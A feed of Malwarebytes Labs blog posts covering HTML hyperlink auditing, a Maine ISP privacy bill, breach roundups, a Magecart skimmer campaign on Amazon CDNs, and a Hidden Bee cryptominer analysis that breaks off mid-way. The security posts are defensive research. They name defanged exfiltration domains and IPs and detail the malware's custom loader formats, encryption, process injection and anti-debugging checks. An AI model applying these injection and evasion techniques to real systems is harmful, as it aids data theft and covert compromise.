From a technical perspective, hyperlink auditing is an HTML standard that allows the creation of special links that ping back to a specified URL when they are clicked on. These pings are done in the form of a POST request to the specified web page that can then examine the request headers to see what page the link was clicked on.

The syntax of this HTML5 feature is easy. A website builder can use this syntax to use hyperlink auditing:

<a href=”{destination url}” ping=”{url that receives the information}”>

Under normal circumstances, the second URL will point to some kind of script that will sort and store the received information to help generate tracking and usage information for the site. This can be done on the same domain, but it can also point to another domain or IP where the data can be processed.

What’s the difference between this and normal tracking?

Some of you might argue that there are other ways to track where we go and what we click. And you would be right. But these other methods use Javascripts, and browser users can choose whether they allow scripts to run or not. Hyperlink auditing does not give users this choice. If the browser allows it, it will work.

Which browsers allow link auditing?

Almost every browser allows hyperlink tracking, but until now they offered an option to disable it. However, now major browsers are removing the option for their users to disallow hyperlink auditing.

As of presstime, Chrome, Edge, Opera, and Safari already allow link auditing by default and offer no option to disable it. Firefox has plans to follow suit in the near future, which is surprising as Firefox is one of the few browsers that has it disabled by default. Firefox users can check the setting for hyperlink auditing under about:config >  browser.send_pings.

How can I stop link auditing?

You can’t detect the presence of the “ping” attribute by hovering over a link, so you would have to examine the code of the site to check whether a link has that attribute or not. Or, for more novice users, there are some dedicated browser extensions that block link auditing. For Chrome users, there is an extension called Ping Blocker available in the webstore.

Or you can resort to using a browser that is more privacy focused.

Please read: How to tighten security and increase privacy on your browser

Test if your browser allows hyperlink auditing

The link I posted below is harmless and pings the test IP that we have created especially to check whether the Malwarebytes web protection module is working without actually sending you to a malicious site. So this test will show a warning prompt if the following conditions are met:

  • Malwarebytes Web Protection module is enabled
  • You are allowing Malwarebytes notifications (Settings > Notifications)
  • Your browser allows link auditing

Create a textfile with the code posted below in it and save it as a html file. Rightclick the html file and choose to open it with the browser you want to test. If the browser allows link auditing, then you should see the warning shown below when you click this link:

<a href="" ping="">The ping in this link will be blocked by MBAM</a> Malwarebytes and hyperlink auditing

As demonstrated above, Malwarebytes will protect you if either one of the URLs in a link leads to a known malicious domain or IP. There are no immediate plans to integrate anti-ping functionality in our browser extensions, but it is under consideration. Should the need arise for this functionality to be integrated in any of our products, we will lend a listening ear to our customers.

Abuse of hyperlink auditing

Hyperlink auditing has reportedly been used in a DDoS attack. The attack involved users that visited a crafted web page with two external JavaScript files. One of these included an array containing URLs: the targets of the DDoS attack. The second JavaScript randomly selected a URL from the array, created the <a> tag with a ping attribute, and programmatically clicked the link every second.

Skimmers could use hyperlink auditing if they figure out how to send form field information to a site under their control. If they would be able to plant a script on a site, like they usually do, but in this case use it to “ping” the data to their own site, this would be a method that is hard to block or notice by the visitors of the site.


At the moment, there doesn’t seem to be an urgent need to block hyperlink auditing for the average Internet user. The only real problem here is that it takes third-party software to disable hyperlink auditing when browsers should be offering us that option in their settings. For the more careful Internet users that had disabled hyperlink auditing earlier, it is recommended to check whether that setting is still effectively working on the browser. The option could be removed after every update and you could have missed that this happened.

Stay safe everyone!

The post Hyperlink auditing: where has my option to disable it gone? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards

Malwarebytes - Wed, 06/05/2019 - 19:21

Infosec Europe is now well underway, and last night was the annual EU Security Blogger Awards, where InfoSecurity Magazine:

…recognise[s] the best blogs in the industry as first nominated by peers and then judged by a panel of (mostly) respected industry experts.

Malwarebytes Labs was announced as winner of the Best Cybersecurity Vendor Blog. We previously won best corporate security blog in 2015 and 2016, and we were delighted to see we had several other nominations this year:

  • Best commercial Twitter account (@Malwarebytes)
  • Most educational blog for user awareness
  • Security hall of fame (for our own Jérôme Segura)
  • Grand Prix for best overall blog

It’s excellent to be recognised alongside such legendary security pros as Graham Cluley, Mikko Hyppönen, and Troy Hunt, as well as fellow security companies Tripwire, Sophos, Bitdefender, and many others. Without further ado, let’s see who won in the various categories.

The n00bs: Best new cybersecurity podcast

WINNER: Darknet Diaries

The n00bs: Best new/up and coming blog

WINNER: The Many Hats Club

The corporates: Best cybersecurity vendor blog

WINNER: Malwarebytes

The corporates: Best commercial Twitter account


Best cybersecurity podcast

WINNER: Smashing Security

Best cybersecurity video or cybersecurity video blog

WINNER: Jenny Radcliffe

Best personal (non-commercial) security blog

WINNER: 5w0rdFish

Most educational blog for user awareness


Most entertaining blog


Best technical blog

WINNER: Kevin Beaumont

Best Tweeter

WINNER: Quentynblog

Best Instagrammer

WINNER: Lausecurity

The legends of cybersecurity: hall of fame

WINNER: Troy Hunt

Grand Prix for best overall security blog

WINNER: Graham Cluley

Thank you!

We did indeed win an award thanks to your votes, and we can now set our Best Cybersecurity Vendor Blog trophy next to our two awards for Best Corporate Blog. We’ll continue to provide our readers with breaking news, in-depth research, educational guides on best practices, conference coverage, and much, much more.

We appreciate your votes, especially when there are so many excellent blogs out there, and we hope you might even find a few more valuable sources of information from the links above.

Congratulations to the winners, commiserations to everyone else, a hat-tip to the organisers, and a final round of applause to our readers. We couldn’t have done it without you.

The post Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maine inches closer to shutting down ISP pay-for-privacy schemes

Malwarebytes - Wed, 06/05/2019 - 15:00

Maine residents are one step closer to being protected from the unapproved use, sharing, and sale of their data by Internet service providers (ISPs). A new state bill, already approved by the state House of Representatives and Senate, awaits the governor’s signature.

If signed, the bill would provide some of the strongest data privacy protections in the United States, putting a latch on emails, online chats, browser history, IP addresses, and geolocation data collected and stored by ISPs like Verizon, Comcast, and Spectrum. The bill goes further: Unlike a data privacy proposal in the US and a new data privacy law in California, the Maine bill explicitly shuts down any pay-for-privacy schemes.

The Act to Protect the Privacy of Online Customer Information (or LD 946 for short) would go into effect on July 1, 2020. It is, with minor exception, widely supported, even among its intended targets.

“We sell Internet access, and we know that if people can’t trust the Internet, then the value of the Internet is significantly lessened, as it will be used less for sensitive applications,” wrote Fletcher Kittredge and Kerem Durdag, CEO and COO of Maine-based ISP GWI. “Even if government regulation blocks us from making money selling customer data (something we never ever do), we still benefit because a trusted Internet is more valuable to all our customers.”

Not everyone agrees, though.

The Maine State Chamber of Commerce opposes the bill and, following the Senate’s unanimous approval last week (35–0), has vowed to “ensure that this harmful bill does not become law.”

The Chamber’s arguments have puzzled the ACLU of Maine, a supporter of LD 946. According to the nonprofit, the Chamber has engaged in “gaslighting” and “disingenuous” advertising, serving as a mouthpiece for the region’s big ISPs.

The Chamber did not respond to requests for comment.

Further, the Chamber commissioned a public survey that handwaves away the actual matter at hand: Should ISPs be restricted from selling user data?

To the ACLU of Maine, that answer is clear: Yes.

“This bill protects Mainers from having their ISPs sell their data without their knowledge and consent,” said Oamshri Amarasingham, advocacy director of ACLU of Maine.

The bill

Sponsored by Maine state Democratic Senator Shenna Bellows, LD 946 would prohibit ISPs from using, disclosing, selling, or allowing access to customers’ “personal information.” That includes the content of online communications, web browsing history, app usage history, “precise geolocation information,” and health and financial information.

This bill does not exist in a vacuum. In February, Motherboard revealed that, for years, actual, honest-to-God bounty hunters could access the location data of AT&T, T-Mobile, and Sprint customers. It gets better (worse): The location data was initially intended for 911 operators, but was sold to data aggregators by the telecom companies themselves.

Away from bounty hunter headlines, The Verge also spotlighted AT&T’s future profiteering plans last month to monetize nearly every piece of its customers’ data.

Under LD 946, that activity would be regulated.

The bill allows for some exceptions. An ISP could sell user data so long as the user consents to that sale, and ISPs could also use and disclose user data when complying with court orders, rendering bills, protecting users from fraud and abuse, and providing their services, so long as the user data is necessary to those services. Further, ISPs could disclose geolocation data in the case of emergencies, like dispatching 911 services.

The bill also closes a few potential loopholes, prohibiting ISPs from requiring that users consent to the sale of their data in order to use their services. The bill also states that ISPs must provide “clear, conspicuous, and nondeceptive notice” when users consent to sell their data.

Finally, the bill shuts down any “pay-for-privacy” schemes that have already proved popular. According to the bill, ISPs cannot “charge a customer a penalty or offer a customer a discount based on the customer’s decision to provide or not provide consent” to having their data sold, shared, or accessed by third parties.


As we previously wrote about Sen. Ron Wyden’s data privacy proposal, which includes a pay-for-privacy stipulation:

“[Pay-for-privacy] casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The ‘haves’ can operate online free from prying eyes. But the ‘have nots’ must forfeit that right.”

The Maine state bill does its part to prevent that unequal outcome.

Maine Governor Janet Mills has until June 11 to sign the bill and turn it into law. If she misses the deadline, the bill automatically becomes law.

Amarasingham of ACLU of Maine expects a positive outcome.

“We are optimistic that [Governor Mills] will sign this bill,” Amarasingham said. “I know ISPs and the Chamber of Commerce are exerting a lot of pressure, but I’m proud to say Maine legislators didn’t cave to that. I hope the governor’s office won’t either.”

The opposition

The challenge to LD 946 includes claims of insufficiency, unproven rhetoric, misguiding statistics, and a question as to what legislation should accomplish.

As Amarasingham said, one of the bill’s main opponents is the Maine State Chamber of Commerce. In recent months, the Chamber funded a 30-second video ad criticizing the bill, hired a research firm to conduct public surveys about data privacy, and launched a website that asked Maine residents to tell their representatives to vote against the bill.

That website labeled LD 946 as “harmful to Maine’s consumers,” because, allegedly, the bill “will create greater consumer confusion and undermine consumers’ confidence in their online activities—a risk to the continued growth of the digital economy.”

That confusion argument showed up in a Central Maine opinion piece written by Mid-Maine Chamber of Commerce president and CEO Kimberly Lindlof. Lindlof wrote that a “patchwork” of state data privacy laws—with different standards across different state lines—could create a scenario where Maine residents “might have to opt in to a privacy setting in Maine but opt out of that setting if you go into another state for vacation.”

But the Mid-Maine Chamber of Commerce and the Maine State Chamber of Commerce both oppose LD 946 for another reason: The bill does not go far enough.

According to both agencies, LD 946 should apply not just to companies that provide Internet service, but also companies that operate their businesses online, such as Google and Facebook. The Chamber’s video ad, which it posted on Facebook, said that “it doesn’t make sense” to leave out these big Silicon Valley tech companies which have repeatedly failed to protect user data. (The video ad also claims that that LD 946 “exempts Facebook,” which is flatly untrue—it simply does not apply to Facebook. There are no written exemptions for the company.)

Boiled down, the Chamber wants a stronger bill.

However, this is an ideological argument about policy: Should legislation immediately achieve broad goals, or should it take individual steps towards those goals?

According to Amarasingham, the reality of policy-making is the latter.

“The nature of legislation and law reform is that it is incremental,” she said. “There is no one bill on any issue that solves an entire problem. This bill is an enormous first step and it is very important.”

Following the Senate’s approval of LD 946 last week, the Chamber responded on its website:

“Today the State Senate failed to protect the online privacy of all Maine consumers in passing LD 946, a fundamentally flawed bill that will do little to make Mainers’ personal privacy more secure on the Internet. Despite the fact that 87% [nearly 90%] of Mainers believe a state law should apply to all companies on the Internet according to a recent survey, senators chose to pass a bill that leaves consumers’ personal data unprotected when they are using websites, search engines, and social media apps.”

Those statistics deserve scrutiny.

The statement cites a Chamber-funded survey by David Binder Research, in which the firm conducted 600 telephone interviews between May 9 and May 11. The statistic referenced by the Chamber pertains to this question:

“If the Maine state legislature were to pass a law today to protect your personal privacy, should this law apply to just a few companies on the Internet, with the idea of passing more law [sic] in the future to cover additional companies on the Internet, or should this law apply to all companies?”

According to the survey, 87 percent of respondents answered “All companies.”

But that question asks respondents to make a choice between two entirely different things—one of them literally exists and the other does not.

LD 946, which applies to a “few companies,” is written. A bill that applies to “all companies” is not. This is a choice between reality and possibility.

Further, the question’s language obfuscates a core difference between “companies on the Internet”—like Google and Facebook—and companies that provide the internet. These are not the same.

The Maine State Chamber of Commerce did not respond to emailed questions about when it last created a website campaign against a bill, or about why it believes the potential for broader privacy protections supersedes the current bill’s incremental protections. The Chamber also did not reply to a voicemail providing similar questions.

If at this point, you’re confused about how incremental protections against sneaky ISP behavior could be seen as “harmful,” you’re not alone. Tracking the Chamber’s privacy-protective messaging against its anti-ISP-protection messaging can make anyone’s head spin.

“I can’t say that I fully understand why the Chamber is carrying Spectrum and AT&T’s water on this,” Amarasingham said. “Their top line, outward-facing message was Mainers deserve privacy protections, which is also our top line message.”

Amarasingham continued: “This is real privacy protection.”

Data privacy shoulds and should-nots

Should rules be written to stop Facebook and Google and dozens of Silicon Valley tech companies from profiting off your data? That depends on several factors, like what those rules would look like, how they would be implemented and enforced, and what exemptions would apply, not to mention whether those rules would nullify current state rules that are being pushed forward today.

But should ISPs be allowed to sell user data without consent when there is already a widely-supported plan in place to stop them? Absolutely not.

The post Maine inches closer to shutting down ISP pay-for-privacy schemes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Magecart skimmers found on Amazon CloudFront CDN

Malwarebytes - Tue, 06/04/2019 - 15:00

Update (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official website.

The skimmer was inserted in this JavaScript library:


Interestingly, this same library had already been altered (loading content from installw[.]com) some time earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the page can be found here.

Late last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network (CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.

Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.

Without properly validating content loaded externally, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.

The ideal place to conceal a skimmer

CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.

The sites we identified during a crawl had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.

This first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code and using obfuscation to conceal itself.

Site loading a compromised JavaScript library from its own AWS S3 bucket

This second case shows the skimmer injected not just in one library, but several contained within the same directory, once again part of an S3 bucket that is only used by this one website.

Fiddler traffic capture showing multiple JavaScript files on AWS injected with skimmer

Finally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.

Fiddler traffic capture showing skimmer injected in a custom CloudFront repository Exfiltration gate

This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.

While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).

Snippet of the skimmer code showing functions used to exfiltrate data

As such, many did not even have a payment form within their site. Most simply had a sign up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.

Connection with existing campaign

The skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.

RiskIQ, in partnership with and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.

Comparison snapshots: the exfiltration gate changing after original domain gets sinkholed

A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.

Creation Date: 2019-05-16T07:12:30Z
Registrar: Shinjiru Technology Sdn Bhd
Name Server: NS1.CARBON2U.COM
Name Server: NS2.CARBON2U.COM

The domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates also registered recently.

VirusTotal graph showing new gates and revealing that old gates are back online

What we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the hands of the criminals.

Historical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.

Finding and exploiting weaknesses

This type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a viable option, so they will look for other ways.

While this example is not a third-party script supply-chain attack, it is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as your actual website, other measures—such as validation of any externally loaded content (via Subresource Integrity checks, for example)—can save the day.

We reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.

Indicators of Compromise (IoCs)


The post Magecart skimmers found on Amazon CloudFront CDN appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 27 – June 2)

Malwarebytes - Mon, 06/03/2019 - 17:09

Last week on Malwarebytes Labs, we took readers through a deep dive—way down the rabbit hole—into the novel malware called “Hidden Bee.” We also looked at the potential impact of a government agency’s privacy framework, and delivered to readers everything they needed to know about ATM attacks and fraud. Lastly, amidst continuing news about the City of Baltimore suffering a ransomware attack, we told readers what they should do to prepare themselves against similar threats.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (May 27 – June 2) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Leaks and breaches: a roundup

Malwarebytes - Mon, 06/03/2019 - 16:47

It’s time for one of our semi-regular breach/data exposure roundup blogs, as the last few days have brought us a few monsters. If you use any of the below sites, or if you think some of your data has been sitting around exposed, we’ll hopefully give you a better idea of what the issue is.

Seeing so many services be compromised or simply exposed for all to see without being secured is rather fatiguing, and we’d hate for the end result to be hands thrown in the air with a cry of “Why bother!” Without further ado, then, let’s take a look at breach number one.

Canva: Breached

Something in the region of 139 million users of graphic design service Canva had their data swiped by a hacker known for many other large compromises. Usernames, emails, real names, and cities were amongst the data swiped. A big chunk of users had a combination of password hashes and Google tokens grabbed, too.

There’s some issues with how Canva initially reported this. The “we’ve been hacked” message followed by a short email ramble about free images, led to concerns that many users may have ignored it completely. However, Canva has been quick to deal with the problem at hand and even have—shock and horror in amazement—a good slice of information about it on their status page. In fact, they have even more information on a dedicated update portal.

In a nutshell, Canva states that your login passwords are unreadable, other credentials are similarly secure, your designs are safe, your card details haven’t been grabbed, and you should change your login as a precautionary measure.


Flipboard: breached

Breach number two: Massively-successful news aggregator Flipboard was also caught by an attack according to a statement released on May 28. This attack took place sometime between June 2018 and March 2019. They haven’t said how many accounts were breached, but as with Canva, they were careful to stress that stolen logins would be incredibly difficult to break into thanks to the fact that they didn’t store passwords in plain text. Additionally, they’ve reset everybody’s login credentials as a precautionary security response.

The attackers grabbed the usual collection of valuables: usernames, hashed/salted passwords, some email addresses, and third-party digital tokens. As with the Canva breach, Flipboard has been upfront about the whole fiasco and are being a lot more proactive than many companies faced with similar situations.

Amazingco: exposed data

Next up, we have another example of “utterly unsecured database full of information readily available to someone with a web browser.” This is incredibly common, and a major source of data breaches/leaks. Hacking into servers, exploiting databases, phishing logins from admins? Too much hard work. Criminals need only go looking for wide-open goal areas instead.

In this case, the open goal belonged to an Australian marketing company called Amazingco. 174,000 records were there for the taking, containing everything from names and addresses to phone numbers, event types, and even IP addresses and ports.

We don’t know how long the data was sitting there, and we also don’t know if this information was meant to be sitting on the open Internet, or if someone possibly misconfigured something. What we do know is that this database has now been taken offline.

At this stage, there’s no real way to know if someone up to no good has grabbed it. However, if people with good intentions could find it, then so, too, could bad ones. Customers of Amazingco should practice wariness of attacks, as spear phishing will likely now be the order of the day.

First American Financial Corp: exposed data

Possibly the largest and most damaging of the bunch, our fourth incident is another one where data is freely available to someone sporting a web browser. First American Financial Corp had “hundreds of millions of documents related to mortgage deals, going back to 2003” digitised and ready to view without authentication.

Social security numbers, drivers licenses, account statements, wire transaction records, bank account numbers, and much more were all lurking in the pile. That pile was estimated to weigh in at around 885 million files, and as security researcher Brian Krebs notes, this would be an absolute gold mine for phishers and purveyors of Business Email Compromise scams. The data has now been taken offline, but that’s scant consolation for anyone affected.

What’s the upshot?

Don’t panic, but do be cautious. According to security firm Mimecast, 65 percent of organisations saw an increase in impersonation attempts year over year. Some of the above leaks could be extremely useful to scammers wanting to muscle in on victims, and you never know when someone’s going to try it on. The slightest bit of inattentiveness could lead to a spectacular mishap, and we don’t want that taking place.

The post Leaks and breaches: a roundup appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hidden Bee: Let’s go down the rabbit hole

Malwarebytes - Fri, 05/31/2019 - 17:32

Some time ago, we discussed the interesting malware, Hidden Bee. It is a Chinese miner, composed of userland components, as well as of a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS).

Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the used formats. In this post, we will take a deep dive in the functionality of the loader and the included changes.


831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box


The Hidden Bee runs silently—only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes.

Initially, the main sample installs itself as a Windows service:

Hidden Bee service

However, once the next component is downloaded, this service is removed.

The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe.

If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes:

Results of the scan by hollows_hunter

Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements:

Hidden Bee implants are placed in RWX memory

Some of them are lacking typical PE headers, for example:

Executable in one of the multiple customized formats used by Hidden Bee

But in addition to this, we can also find PE files implanted at unusual addresses in the memory:

Manually-loaded PE files in the memory of WmiPrvSE.exe

Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll (NVIDIA CUDA Runtime, Version 8.0.61 ). CUDA is a technology belonging to NVidia graphic cards. So, their presence suggests that the malware uses GPU in order to boost the mining performance.

When we inspect the memory even closer, we see within the executable implants there are some strings referencing LUA components:

Strings referencing LUA scripting language, used by Hidden Bee components

Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports.

We can also see the strings referencing the mining activity, i.e. the Cryptonight miner.

List of modules:


And we can even retrieve the miner configuration:

.gist table { margin-bottom: 0; } Inside

Hidden Bee has a long chain of components that finally lead to loading of the miner. On the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are going to be mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules—on the way also using its own TCP-based protocol.

The first part of the loading process is described by the following diagram:

Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules.

Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.

The loader

In contrast to most of the malware that we see nowadays, the loader is not packed by any crypter. According the header, it was compiled in November 2018.

While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader.

The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.

The loading function

Section .shared contains the configuration:

Encrypted configuration. The last 16 bytes after the data block is the key.

The configuration is decrypted with the help of XTEA algorithm.

Decrypting the configuration

The decrypted configuration must start from the magic WORD “pZ.” It contains the C&C and the name under which the service will be installed:

Unscrambling the NE format

The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE.

The loader, unpacking the next stage

NE is one of the two similar formats being used by this malware. Another similar one starts from a DWORD 0x0EF1FAB9 and is used to further load components. Both of them have an analogical structure that comes from slightly modified PE format:


WORD magic; // 'NE'
WORD pe_offset;
WORD machine_id;

The conversion back to PE format is trivial: It is enough to add the erased magic numbers: MZ and PE, and to move displaced fields to their original offsets. The tool that automatically does the mentioned conversion is available here.

In the previous edition, the parts of Hidden Bee with analogical functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

Second stage: a downloader (in NE format)

As a result of the conversion, we get the following PE: (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set as a driver, however, it is not loaded like a typical driver. The custom loader loads it into a user space just like any typical userland component.

The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example:

0012FE9C 00601A34 UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
0012FEA0 00407104 UNICODE "NAPCUYWKOxywEgrO"
0012FEA4 00407004 UNICODE ""

Calling the Entry Point of the manually-loaded NE module

The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service.

If the module detects that it is already running as a service, it takes the second path. In such a case, it proceeds to download the next module from the server. The next module is packed as as Cabinet file.

The downloaded Cabinet file is being passed to the unpacking function

It is first unpacked into a file named “core.sdb”. The unpacked module is in a customized format based on PE. This time, the format has a different signature: “NS” and it is different from the aforementioned “NE” format (detailed explanation will be given further).

It is loaded by the proprietary loader.

The loader enumerates all the executables in a directory: %Systemroot%\Microsoft.NET\ and selects the ones with the compatible bitness (in the analyzed case it was selecting 32bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to APC queue.

Hidden Bee component injecting the next stage (core.sdb) into a new process

In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead.

Unscrambling the NS format

As mentioned before, the core.sdb is in yet another format named NS. It is also a customized PE, however, this time the conversion is more complex than the NE format because more structures are customized. It looks like a next step in the evolution of the NE format.

Header of the NS format

We can see that the changes in the PE headers are bigger and more lossy—only minimalist information is maintained. Only few Data Directories are left. Also the sections table is shrunk: Each section header contains only four out of nine fields that are in the original PE.

Additionally, the format allows to pass a runtime argument from the loader to the payload via header: The pointer is saved into an additional field (marked “Filled Data” on the picture).

Not only is the PE header shrunk. Similar customization is done on the Import Table:

Customized part of the NS format’s import table

This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.

Third stage: core.sdb

The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9.

The interesting part is that the external loader does not complete the full loading process of the module. It only copies the sections. But the rest of the module loading, such as applying relocations and filling imports, is done internally in the core.sdb.

The loading function is just at the Entry Point of core.sdb

The previous component was supposed to pass to the core.sdb an additional buffer with the data about the installed service: the name and the path. During its execution, core.sdb will look up this data. If found, it will delete the previously-created service, and the initial file that started the infection:

Removing the initial service

Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

After locking the mutex in a format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before it goes to download, first, a few things are checked.

Checks done before download of the next module

First of all, there is a defensive check if any of the known debuggers or sniffers are running. If so, the function quits.

The blacklist

Also, there is a check if the application can open a file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’.

If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint:


The hash (sz=) is an MD5 generated from VolumeIDs. Then follows the (os=) identifying version of the operating system, and the identifier of the architecture (ar=), where 0 means 32 bit, 1 means 64bit.

The content downloaded from this URL (starting from a magic DWORD 0xFEEDFACE – 79e851622ac5298198c04034465017c0) contains the encrypted package (in !rbx format), and a shellcode that will be used to unpack it. The shellcode is loaded to the current process and then executed.

The ‘FEEDFACE’ module contains the shellcode to be loaded

The shellcode’s start function uses three parameters: pointer to the functions in the previous module (core sdb), pointer to the buffer with encrypted data, size of the encrypted data.

The loader calling the shellcode Fourth stage: the shellcode decrypting !rbx

The beginning of the loaded shellcode:

The shellcode does not fill any imports by itself. Instead, it fully relies on the functions from core.sdb module, to which it passes the pointer. It makes use of the following function: malloc, mecpy, memfree, VirtualAlloc.

Example: calling malloc via core.sdb

Its role is to reveal another part. It comes in an encrypted package starting from a marker !rbx. The decryption function is called just at the beginning:

Calling the decrypting function (at Entry Point of the shellcode)

First, the function checks the !rbx marker and the checksum at the beginning of the encrypted buffer:

Checking marker and then checksum

It is decrypted with the help of RC4 algorithm, and then decompressed.

After decryption, the markers at the beginning of the buffer are checked. The expected format must start from predefined magic DWORDs: 0xCAFEBABE,0, 0xBABECAFE:

The !rbx package format

The !rbx is also a custom format with a consistent structure.

DWORD magic; // "!rbx"
DWORD checksum;
DWORD content_size;
BYTE rc4_key[16];
DWORD out_size;
BYTE content[];

The custom file system (BABECAFE)

The full decrypted content has a consistent structure, reminiscent of a file system. According to the previous reports, earlier versions of Hidden Bee used to adapt the ROMS filesystem, adding few modifications. They called their customized version “Mixed ROM FS”. Now it seems that their customization process has progressed. Also the keywords suggesting ROMFS cannot be found. The headers starts from the markers in the form of three DWORDS: { 0xCAFEBABE, 0, 0xBABECAFE }.

The layout of BABECAFE FS:

We notice that it differs at many points from ROM FS, from which it evolved.

The structure contains the following files:

/installer/com_x86.dll (6177bc527853fe0f648efd17534dd28b)

The files /pkg/sputnik.spk and /pkg/plugins.spk are both compressed packages in a custom !rsi format.

Beginning of the !rsi package in the BABECAFE FS

Each of the spk packages contain another custom filesystem, identified by the keyword SPUTNIK (possibly the extension ‘spk’ is derived from the SPUTNIK format). They will be unpacked during the next steps of the execution.

Unpacked plugins.spk: 4c01273fb77550132c42737912cbeb36
Unpacked sputnik.spk: 36f3247dad5ec73ed49c83e04b120523.

Selecting and running modules

Some executables stored in the filesystem are in two version: 32 and 64 bit. Only the modules relevant to the current architecture are loaded. So, in the analyzed case, the loader chooses first: /bin/i386/preload (shellcode) and /bin/i386/coredll.bin (a module in NS custom format). The names are hardcoded in the loader within the loading shellcode:

Searching the modules in the custom file system

After the proper elements are fetched (preload and coredll.bin), they are copied together into a newly-allocated memory area. The coredll.bin is copied just after preload. Then, the preload module is called:

Redirecting execution to preload

The preload is position-independent, and its execution starts from the beginning of the page.

Entering ‘preload’

The only role of this shellcode is to prepare and run the coredll.bin. So, it contains a custom loader for the NS format that allocates another memory area and loads the NS file there.

Fifth stage: preload and coredll

After loading coredll, preload redirects the execution there.

coredll at its Entry Point

The coredll patches a function inside the NTDLL— KiUserExceptionDispatcher—redirecting one of the inner calls to its own code:

A patch inside KiUserExceptionDispatcher

